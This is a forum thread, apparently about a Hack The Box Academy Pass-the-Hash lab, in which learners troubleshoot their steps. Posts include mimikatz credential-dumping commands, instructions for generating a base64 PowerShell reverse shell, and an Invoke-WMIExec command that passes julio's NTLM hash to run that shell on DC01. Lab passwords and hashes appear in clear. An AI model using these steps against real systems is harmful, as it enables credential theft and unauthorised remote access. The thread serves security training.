As many people have said, some tasks seem to be particularly difficult, which can be very frustrating, although they give the opportunity to hone micro-techniques (which is what I keep in mind to stay motivated). This question has got the better of me for too long now.
I will provide the sequence of methods, commands and outcomes undertaken; can someone please let me know where I'm going wrong here? I feel as though I'm completing everything correctly but still can't manage to catch a shell.
Firstly, I'm using evil-winrm to change the restricted admin mode with the following commands:
Following this, I'm dumping NTLM hashes using mimikatz with the following commands:
privilege::debug
sekurlsa::logonPasswords full
This gives me the NTLM hashes for 4 user accounts (I won't provide the hashes here to avoid spoilers):
MS01
julio
david
john
Next, I RDP using julio's creds as per the question.
From there I try to initiate a pass the hash (PtH) using mimikatz with MS01's creds (this is to enable the listener with MS01 as the user, as the question states that the machine will only connect back to MS01). This executes with no errors; however, when whoami is run, the user printed is still julio (to try to rule out error I tried the same process when RDPing using admin creds, which allowed me to PtH into MS01). This was done using the following command:
Finally, using PowerShell, the following commands are executed to catch the shell (the following socket was configured in the PowerShell #3 base64 rev shell generator: 127.16.1.5:8001):
Note: all instances of cmd and PS are run as admin.
I have tried this sequence various times, on my local machine and with the Pwnbox, and I just can't get it to work. I'm thinking my error lies in step 6, where I can't PtH to MS01.
Thanks for taking the time to read; all help appreciated.
Make sure to generate your own shell using https://www.revshells.com/. I couldn't get it to work with the shell provided in their notes, even though the IP and ports used were identical. I generated my own and it came right up.
I had some issues with this too, and these steps helped me:
removed the -domain flag.
kept the user as julio
added -verbose to troubleshoot
did an Import-Module .\Invoke-TheHash.psd1 in Powershell.
For the raw shell, I picked PowerShell #3 on the left-hand list. In the shell drop-down pick “powershell” and leave the encoding drop-box set to none. I also changed my port to 9434. You want to use the IP of the attack Windows host. Then I copied just the encoded block into the example shown in the section and updated the parameters/flags accordingly.
Can anyone explain to me in a logical manner what the ask is in the last question of the PtH section:
Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Let’s go step by step, following the instructions:
Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console
I am logged in through xfreerdp to 10.129.131.149 with user “Administrator” and password “30B3783CE2ABF1AF70F77D0660CF3453”. My interpretation of the instruction is the following:
From where you have gotten to in the listener, try “hostname”; remember you're looking for DC01.
You can message me directly if you still need further instruction
It's been a while since I completed this lab, but I'm sure the issue I was having had something to do with the PowerShell script/syntax. In the lesson HTB provides multiple examples of PS scripts with slightly different syntax, which is easily overlooked. Try using the other examples. Hope this helps.
Just got it right after 3 hours…
Be careful not to leave blank spaces when filling in the parameters for the payload on revshells.
First, RDP to the box with the Admin user and its hash.
This is the syntax for mimikatz:
Import-Module .\Invoke-WMIExec.ps1 or Import-Module .\Invoke-TheHash.psd1
Then start your listener and type (replace the b64 with your generated payload):
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <base64 payload>" and then, open a cmd on the same target and type whoami;hostname
What the ■■■■ is going on in the HTB? I did the same thing and was getting the same result when I was using Evil-WinRM on my Kali Linux. But after spending 4 and a half hours I did the exact same thing in RDP and got the reverse shell (an actual one, with command-execution capability). This is the problem with HTB. Their services don't run accurately on other machines; even I have faced the same problem on SSH.